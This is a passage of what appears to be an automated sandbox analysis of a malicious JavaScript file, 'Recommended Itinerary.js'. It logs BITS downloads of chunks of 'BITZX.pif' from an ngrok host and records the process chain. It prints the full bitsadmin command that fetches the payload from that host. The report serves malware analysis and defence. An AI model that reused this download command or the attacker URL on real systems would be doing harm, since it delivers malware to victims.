        Data Ascii: M/"/a(00-0*.(C(9***0*AL0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        146192.168.11.20498603.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:54 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=34994-35102
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:55 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 109
        Content-Range: bytes 34994-35102/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:55 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:55 UTC109INData Raw: 00 00 bf 07 00 00 ef 17 00 00 98 00 00 00 00 00 00 00 02 00 00 00 da 0c 00 00 ad 0b 00 00 87 18 00 00 b1 00 00 00 00 00 00 00 00 00 00 00 34 00 00 00 04 19 00 00 38 19 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00
        Data Ascii: 48-0*.(C(9***


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        147192.168.11.20498613.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:46:57 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=35103-35206
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:46:58 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 104
        Content-Range: bytes 35103-35206/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:46:58 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:46:58 UTC104INData Raw: 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 64 00 00 02 00 00 00 11 19 00 00 dc 00 00 00 ed 19 00 00 cd 00 00 00 00 00 00 00 02 00 00 00 f7 0f 00 00 26 17 00 00 1d 27 00 00 c0 00 00 00 00 00 00 00 02 00 00 00 e0 0c 00 00 fd 1a 00 00 dd 27 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 17 28 00
        Data Ascii: 0*Ad&''`(


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        148192.168.11.20498623.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:47:01 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=35207-35497
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:47:02 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 291
        Content-Range: bytes 35207-35497/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:47:01 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:47:02 UTC291INData Raw: 00 77 28 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 7c 00 00 02 00 00 00 56 18 00 00 30 01 00 00 86 19 00 00 90 00 00 00 00 00 00 00 02 00 00 00 89 14 00 00 f9 0c 00 00 82 21 00 00 94 00 00 00 00 00 00 00 02 00 00 00 d0 0e 00 00 0d 19 00 00 dd 27 00 00 ad 00 00 00 00 00 00 00 02 00 00 00 f6 0b 00 00 94 1c 00 00 8a 28 00 00 98 00 00 00 00 00 00 00 00 00 00 00 5b 00 00 00 c7 28 00 00 22 29 00 00 93 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00
        Data Ascii: w(~-0*.(C(9***0*A|V0!'([(")-0*.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        149192.168.11.20498633.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:47:05 UTC231OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=35498-35606
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:47:06 UTC314INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 109
        Content-Range: bytes 35498-35606/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:47:06 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:47:06 UTC109INData Raw: 00 00 ea 0c 00 00 8e 1c 00 00 cd 00 00 00 00 00 00 00 02 00 00 00 21 06 00 00 fc 18 00 00 1d 1f 00 00 9c 00 00 00 00 00 00 00 02 00 00 00 71 03 00 00 48 1c 00 00 b9 1f 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 88 00 00 00 cb 1f 00 00 53 20 00 00 7e 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43
        Data Ascii: !qHS ~-0*.(C


        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        Behavior

        Click to jump to process

        System Behavior

        General

        Target ID:0
        Start time:11:39:26
        Start date:16/12/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Recommended Itinerary.js"
        Imagebase:0x7ff669b60000
        File size:170'496 bytes
        MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        General

        Target ID:2
        Start time:11:39:31
        Start date:16/12/2024
        Path:C:\Windows\System32\bitsadmin.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\user\BITZX.pif
        Imagebase:0x7ff6b2890000
        File size:211'456 bytes
        MD5 hash:01AAB62D5799F75B0D69EB29C1CA6855
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:false

        General

        Target ID:3
        Start time:11:39:31
        Start date:16/12/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6b16c0000
        File size:875'008 bytes
        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        General

        Target ID:4
        Start time:11:39:31
        Start date:16/12/2024
        Path:C:\Windows\System32\svchost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Imagebase:0x7ff765040000
        File size:57'360 bytes
        MD5 hash:F586835082F632DC8D9404D83BC16316
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:false

        Disassembly

        No disassembly